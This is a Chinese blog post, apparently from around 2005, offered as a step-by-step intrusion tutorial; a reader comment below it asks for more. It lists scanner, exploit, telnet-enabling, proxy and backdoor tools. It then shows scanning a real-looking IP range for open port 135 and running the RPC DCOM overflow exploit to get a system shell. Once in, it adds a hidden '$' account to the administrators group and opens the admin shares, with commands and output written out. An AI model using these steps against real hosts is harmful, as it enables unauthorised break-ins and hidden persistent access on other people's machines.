手把手教你入侵- -
:)
需要的工具:
很好的: radmin.exe
扫描工具: retinarpcdcom.exe
溢出攻击工具:RpcDcom(通用溢出工具)
脚本开启telnet工具:telnet.vbe opentelnet.exe resumetelnet.exe
代理:sksockserver.exe
后门程序:WinEggDropShellPro3thVersion
好了,该做的都做的差不多了。现在开始把~~
首先使用retinarpcdcom.exe扫描一个网段。查找有rpc漏洞的机子,这个漏洞需要135端口开放,(想必
随便扫一下就会发现有许多主机开放的135端口)。。。。。。
(人走运座着都能检到钱) 211.217.50.xx 第一个主机就被扫出来又此漏洞。开始工作
看看211.217.50.xx有没有其他的漏洞或是若口令之类的.我们可以使用流光扫描一下, 好了..看样子没有其他的缺陷,主机开了3389端口,我们可以上去看一下是xp版本还是win2k哈哈,是win2k server版本
展开命令行:
[查看dcomrpc的用法 用法 dcomrpc -d [options] ]
F:\hack>cd rpc\dcomrpc
RPC DCOM Expl01t coded by .:[oc192.us]:. Security
Complied and Modified by Expl01t www.longker.com
Usage:
dcomrpc -d [options]
Options:
-d: Hostname to attack [Required]
-t: Type [Default: 0]
-r: Return address [Default: Selected from target]
-p: Attack port [Default: 135]
-l: Bindshell port [Default: 666]
Types:
0 [0x0018759f]: [Win2k-Universal]
1 [0x0100139d]: [WinXP-Universal]
开始进行溢出:
F:\hack>cd rpc\dcomrpc -d 211.217.50.xx 0
RPC DCOM remote expl01t - .:[oc192.us]:. Security
Complied and recorrected by Expl01t www.longker.com
[+] Resolving host..
[+] Done.
[+] Expl01ting....Just wait......
等到出现,说明溢出成功
c:\winnt\system32>
接着我们建立用户
c:\winnt\system32>net user blueye$ 1111 /add
命令成功完成。
把用户添加成超级管理员
c:\winnt\system32>net localgroup administrators blueye$ /add
命令成功完成。
看看共享开了没有,没有的话把共享开开
c:\winnt\system32>net share
清单是空的。
c:\winnt\system32>net share ipc$
命令成功完成。
c:\winnt\system32>net share admin$
命令成功完成。
到这里我们入侵告一段落
Trackback
你可以使用这个链接引用该篇文章 http://publishblog.blogchina.com/blog/tb.b?diaryID=1965965
回复
|
- 评论人:xukun 2005-08-14 22:41:09 |
|||
快更新啊!老兄 |
||||